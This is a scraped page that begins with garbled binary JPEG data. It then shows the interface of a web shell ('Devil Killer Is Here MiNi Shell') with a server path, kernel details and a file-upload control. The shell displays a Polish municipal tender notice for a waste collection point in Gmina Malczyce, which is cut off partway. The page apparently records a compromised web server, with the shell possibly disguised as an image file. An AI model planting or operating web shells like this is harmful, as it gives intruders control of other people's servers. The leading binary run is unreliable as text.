JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211223/0033003801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> PRZYGOTOWANIE i OBSŁUGA PUNKTU SELEKTYWNEGO ZBIERANIA <br/>ODPADÓW KOMUNALNYCH (PSZOK)<br/>NA TERENIE GMINY MALCZYCE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Malczyce</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Malczyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935023</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Traugutta 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@malczyce.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.malczyce.wroc.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZYGOTOWANIE i OBSŁUGA PUNKTU SELEKTYWNEGO ZBIERANIA <br/>ODPADÓW KOMUNALNYCH (PSZOK)<br/>NA TERENIE GMINY MALCZYCE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-af89bcbd-63e6-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00330038</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00014482/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przygotowanie i obsługa punktu selektywnego zbierania odpadów komunalnych (PSZOK) na terenie Gminy Malczyce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://malczyce.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://malczyce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r., poz. 2415), składa się w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, lub w formie dokumentowej, w<br/>zakresie i w sposób określony w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452).<br/>2. Komunikacja elektroniczna w zakresie przekazywania sobie przez strony postępowania informacji, oświadczeń, wniosków, zawiadomień – za pośrednictwem platformy zakupowej znajdującej się pod adresem: https://malczyce.ezamawiajacy.pl w zakładce „Korespondencja”.<br/>4. Ogólne zasady korzystania z Platformy:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://malczyce.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl , gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu<br/>podanym w w/w potwierdzeniu. <br/>4) po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami , w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy zakupowej. Za<br/>datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”,<br/>5. Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy zakupowej przez opcję „zadaj pytanie” lub przy użyciu zakładki „korespondencja” . w celu zadania pytania Wykonawca klika lewym przyciskiem myszy klawisz „ZADAJ<br/>PYTANIE” i uzupełnia dane Wykonawcy, temat i treść pytania, następnie klika klawisz „POTWIERDŹ”.<br/>Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy „PYTANIE<br/>WYSŁANE”. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2<br/>dni przed upływem terminu składania ofert, pod warunkiem że wniosek o wyjaśnienie treści SWZ<br/>wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Treść<br/>zapytań wraz z wyjaśnieniami, modyfikacje SWZ Zamawiający udostępnia, bez ujawniania źródła<br/>zapytania, na stronie internetowej prowadzonego postępowania – Platformie zakupowej.<br/>Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: Stały<br/>dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;/ Komputer klasy<br/>PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;/ zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;/ Włączona obsługa JavaScript;/ Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>-administratorem Pani/Pana danych osobowych jest Wójt Gminy Malczyce z siedzibą w Malczycach przy ul. Traugutta 15,<br/>- kontakt z inspektorem ochrony danych osobowych możliwy jest pod adresem e-mail iod4@synergiaconsulting.pl lub adresem do korespondencji, którym jest adres administratora,<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z danym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym,<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu ustawę – Prawo zamówień publicznych, dalej „ustawa Pzp”;<br/>- Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>-w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROŚ.271.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje przygotowanie i obsługę punktu selektywnego zbierania<br/>odpadów komunalnych (PSZOK) na terenie gminy Malczyce w okresie od 10.01.2022 r. do 30.11.2022 r. oraz transportu i zagospodarowania zgromadzonych segregowanych odpadów<br/>komunalnych w instalacjach komunalnych albo instalacjach odzysku lub unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (t. j. Dz. U. z 2020 r. poz. 797 ze zm.).<br/>2. Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>1) przygotowanie PSZOK z uwzględnieniem m. in. następujących warunków:<br/>a) PSZOK powinien być zlokalizowany w granicach administracyjnych gminy Malczyce, a miejsce jego lokalizacji w okresie obowiązywania umowy nie ulegnie zmianie;<br/>b) PSZOK zostanie przygotowany i udostępniony mieszkańcom gminy Malczyce od dnia 10.01.2022 r.;<br/>c) lokalizacja obiektu powinna umożliwiać łatwy dostęp wszystkim mieszkańcom gminy Malczyce<br/>oraz swobodny dojazd dla samochodów dostarczających i odbierających odpady, z możliwością zaparkowania pojazdu przy lub na terenie PSZOK-a;<br/>d) PSZOK powinien uwzględniać pomieszczenia socjalno-magazynowe, utwardzony plac składowy, ogrodzenie, oświetlenie, oraz powinien zostać zabezpieczony przed dostępem osób niepowołanych;<br/>e) PSZOK powinien być wyposażony w dostateczną ilość pojemników/kontenerów dostosowanych do selektywnego gromadzenia poszczególnych rodzajów przyjmowanych odpadów, o których mowa w § 2 pkt. 2 ppkt 2.1 wzoru umowy;<br/>f) PSZOK powinien być wyposażony w telefon ze stałym numerem w okresie obowiązywania umowy;<br/>g) Wykonawca opracuje i przekaże Zamawiającemu celem zatwierdzenia Regulamin PSZOK, który następnie Wykonawca opublikuje na swojej stronie internetowej; miejsce przyjmowania odpadów powinno być oznakowane w sposób widoczny oraz posiadać tablicę informacyjną, na której znajduje się Regulamin PSZOK, dane Wykonawcy, wykaz przyjmowanych odpadów;<br/>h) Zamawiający zastrzega sobie obowiązek ważenia odpadów przez Wykonawcę na wadze o tonażu umożliwiającym ważenie pojazdów wjeżdżających i wyjeżdżających z PSZOK-a, a także ważenie mniejszych ilości dostarczonych opadów z dokładnością do 1 kilograma,<br/>2) wykonywanie m. in. następujących usług w zakresie obsługi PSZOK przez cały okres trwania umowy:<br/>a) przyjmowanie bezpłatnie z nieruchomości zamieszkałych na terenie gminy Malczyce, dla których została złożona w Urzędzie Gminy Malczyce deklaracja o wysokości opłaty za gospodarowanie odpadami komunalnymi, następujących rodzajów odpadów z uwzględnieniem § 4 pkt 3 wzoru umowy:<br/>- przeterminowanych leków i chemikaliów takich jak: zużyte oleje, smary i emulsje,<br/>rozpuszczalniki, chemia gospodarcza, aerozole, środki ochrony roślin, farby, lakiery, kwasy,<br/>zasady itp. i opakowań po nich;<br/>- niekwalifikujących się do odpadów medycznych powstających w gospodarstwie domowym w wyniku przyjmowania produktów leczniczych w formie iniekcji i prowadzenia monitoringu poziomu substancji we krwi, w szczególności igieł i strzykawek;<br/>- zużytych baterii i akumulatorów;<br/>- kompletnego zużytego sprzętu elektrycznego i elektronicznego;<br/>- mebli i innych odpadów wielkogabarytowych;<br/>- zużytych opon;<br/>- odpadów budowlanych i rozbiórkowych;<br/>- odpadów papieru, szkła, metalu, tworzyw sztucznych,<br/>- odpadów opakowaniowych wielomateriałowych,<br/>- zmieszanych odpadów opakowaniowych<br/>- odpadów tekstyliów i odzieży<br/>- bioodpadów.<br/>b) przekazywanie zebranych odpadów oraz zagospodarowanie ich po zapełnieniu pojemników/kontenerów, firmą posiadającym odpowiednie zezwolenia, z częstotliwością zapewniającą utrzymanie czystości i porządku na terenie PSZOK-a. W przypadku bioodpadów należy uwzględnić, że czas magazynowania jest ograniczony ze względu na zachodzące procesy biodegradacji;<br/>c) udostępnianie PSZOK mieszkańcom gminy Malczyce przez cały rok (z wyjątkiem świąt i dni ustawowo wolnych od pracy) w dniach:<br/>c.1) środy w godzinach od 13:00 do 17:00,<br/>c.2) piątki w godzinach od 15:00 do 18:00,<br/>c.3) soboty w godzinach od 8:00 do 13:00,<br/>c.4) oraz w dniach zadeklarowanych przez Wykonawcę w ofercie;<br/>d) zapewnienie profesjonalnej obsługi PSZOK przez odpowiednio przeszkolonych pracowników odpowiedzialnych za odbiór, umieszczanie odpadów w odpowiednich kontenerach i pojemnikach, prowadzenie ewidencji odpadów, przekazywanie odpadów firmie transportującej<br/>posiadającej odpowiednie zezwolenia oraz zagospodarowanie ich;<br/>e) zbieranie przyjętych odpadów w kontenerach lub pojemnikach z podziałem na poszczególne ich rodzaje.<br/>f) zapewnienie utrzymania w odpowiednim stanie technicznym i higieniczno-sanitarnym pojemników/kontenerów oraz terenu całego PSZOK-a;<br/>g) każdorazowe potwierdzenie przyjęcia odpadów do PSZOK na formularzu, którego wzór stanowi załącznik nr 3 do wzoru umowy. Zamawiającemu przysługuje w każdym czasie prawo<br/>do zmiany wzoru załącznika. Wykonawca odpowiada za prawidłowe i kompletne uzupełnienie pól formularza oraz udostępnia druk formularza dostarczającym odpady;<br/>h) przekazywanie Zamawiającemu sprawozdania, o którym mowa w art. 9na ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2020 r. poz. 1439 ze zm.).;<br/>i) przedkładanie Zamawiającemu na każde wezwanie dokumentów, o których mowa wyżej w lit.g) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-10 do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna, iż wykonawca spełni warunek, jeżeli potwierdzi, że posiada:<br/>a) aktualne zezwolenie na prowadzenie działalności w zakresie zbierania co najmniej odpadów, które będą przyjmowane do PSZOK-a, wydane przez właściwy organ zgodnie z ustawa o odpadach,<br/>b) aktualny wpis do rejestru działalności regulowanej Wójta Gminy Malczyce w zakresie zbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Malczyce, którychrodzaj został określony w SWZ zgodnie z ustawą o utrzymaniu czystości i porządku w gminach<br/>(t.j. Dz.U. z 2020 r. poz.1439 ze zm.),<br/>c) dokument potwierdzający wpis do rejestru BDO (podmiotów wprowadzających produkty w<br/>opakowaniach i gospodarujących odpadami, o którym mowa w art.49 i 50 ustawy z dnia 14<br/>grudnia 2012 r. o odpadach (t.j. Dz.U. z 2020 r. poz.797 z późn. zm.)<br/>2) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, iż wykonawca spełni warunek, jeżeli potwierdzi, że jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną brutto nie mniejszą niż 200 000,00 PLN,<br/>3) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, iż wykonawca spełni warunek, jeżeli :<br/>a) wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonał:<br/>- co najmniej 1 usługę w zakresie odbierania odpadów komunalnych - o wartości nie mniejszej<br/>niż 60 000,00 PLN brutto.<br/>Przez jedną usługę Zamawiający rozumie wykonanie zamówienia na rzecz jednego podmiotu/ Zamawiającego w ramach jednej umowy/ zlecenia<br/>b) wykaże że dysponuje odpowiednim do przedmiotu zamówienia (przygotowania PSZOK-a) terenem zlokalizowanym w granicach administracyjnych gminy Malczyce, spełniającymi wymagania przepisów budowlanych, sanitarnych i ochrony środowiska. Teren ma zapewnić<br/>możliwość zbierania odpadów, a zaplecze techniczno –biurowe ma umożliwiać codzienną obsługę oraz kontakt Wykonawcy z przedstawicielem Zamawiającego,<br/>c) wykaże, że dysponuje osobami wyznaczonymi do realizacji zamówienia, w tym: - minimum 2 osoby odpowiedzialne za wykonywania m.in. następujących prac: odbiór, umieszczanie odpadów w kontenerach i pojemnikach, prowadzenie ewidencji odpadów, przygotowanie odpadów do transportu, przygotowywanie miesięcznych sprawozdań i protokołów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie Wykonawcy, w zakresie art.108 ust.1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i<br/>konsumentów 